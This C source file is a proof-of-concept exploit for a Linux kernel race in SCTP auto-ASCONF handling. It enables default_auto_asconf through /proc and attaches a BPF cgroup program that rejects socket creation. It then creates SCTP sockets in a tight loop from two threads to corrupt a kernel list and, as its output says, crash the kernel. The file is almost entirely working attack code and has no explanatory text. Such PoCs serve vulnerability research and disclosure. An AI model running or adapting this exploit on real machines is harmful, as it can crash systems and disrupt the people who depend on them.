#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include "bpf_insn.h"
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

#define SCTP_AUTO_ASCONF       30
#define SOL_SCTP	132

char bpf_log_buf[BPF_LOG_BUF_SIZE];

static int prog_load(__u32 idx, __u32 mark, __u32 prio)
{
	struct bpf_insn prog_start[] = {
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
	};
	struct bpf_insn prog_end[] = {
		BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = verdict */
		BPF_EXIT_INSN(),
	};

	struct bpf_insn *prog;
	size_t insns_cnt;
	void *p;
	int ret;

	insns_cnt = sizeof(prog_start) + sizeof(prog_end);

	p = prog = malloc(insns_cnt);
	if (!prog) {
		fprintf(stderr, "Failed to allocate memory for instructions\n");
		return EXIT_FAILURE;
	}

	memcpy(p, prog_start, sizeof(prog_start));
	p += sizeof(prog_start);

	memcpy(p, prog_end, sizeof(prog_end));
	p += sizeof(prog_end);

	insns_cnt /= sizeof(struct bpf_insn);

	ret = bpf_load_program(BPF_PROG_TYPE_CGROUP_SOCK, prog, insns_cnt,
				"GPL", 0, bpf_log_buf, BPF_LOG_BUF_SIZE);

	free(prog);

	return ret;
}

void * create_sock_thread_function(void *arg)
{
    while(1)
    {
        int s1 = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
        if(s1 > 0)
        {
            printf("This should not happen!!!!\n");
            close(s1);
        }
    }
    return NULL;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);

	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		close(fd);
		return false;
	}
	close(fd);
	return true;
}


bool set_default_auto_asconf()
{
    if (!write_file("/proc/sys/net/sctp/default_auto_asconf", "1"))
    {
        perror("Failed to write to default_auto_asconf\n");
        return false;
    }
    return true;
}


/*
    Required capabilities:

        kernel >= 5.8 -
            CAP_BPF, CAP_NET_ADMIN

        kernel < 5.8 -
            CAP_SYS_ADMIN
    
*/
int main(int argc, char **argv)
{
    printf("sctp race poc - privileged user\n");
    char* cgrp_path;
    if (argv[1])
    {
        cgrp_path = argv[1];
    }
    else
    {
        cgrp_path = "/sys/fs/cgroup/unified";
    }

    int cg_fd = open(cgrp_path, O_DIRECTORY | O_RDONLY);
	if (cg_fd < 0)
	{
		printf("Failed to open cgroup path: '%s'\n", strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Opened cgroup path =  %s\n", cgrp_path);

    if (!set_default_auto_asconf())
    {
        return EXIT_FAILURE;
    }

    printf("Successfuly enabled /proc/sys/net/sctp/default_auto_asconf\n");

    int prog_fd = prog_load(0, 0, 0);
    if( prog_fd < 0 )
    {
        perror("prog_load failed\n");
        return 1;
    }

    printf("Successfuly loaded a BPF_PROG_TYPE_CGROUP_SOCK program\n");

    int ret = bpf_prog_attach(prog_fd, cg_fd,
				      BPF_CGROUP_INET_SOCK_CREATE, 0);
	if (ret < 0)
    {
		printf("Failed to attach prog to cgroup: '%s'\n",
			    strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Successfuly attached the program to BPF_CGROUP_INET_SOCK_CREATE\n");

    sleep(1);

    pthread_t create_sock_thread;
    if (pthread_create(&create_sock_thread,
                       NULL,
                       create_sock_thread_function,
                       NULL))
    {
        printf("pthread_create failed with error =  '%s'\n",
			    strerror(errno));
        return EXIT_FAILURE;
    }

    printf("Kernel should crash soon.. (if CONFIG_DEBUG_LIST is enabled)\n");
    create_sock_thread_function(NULL);
    return 0;
}
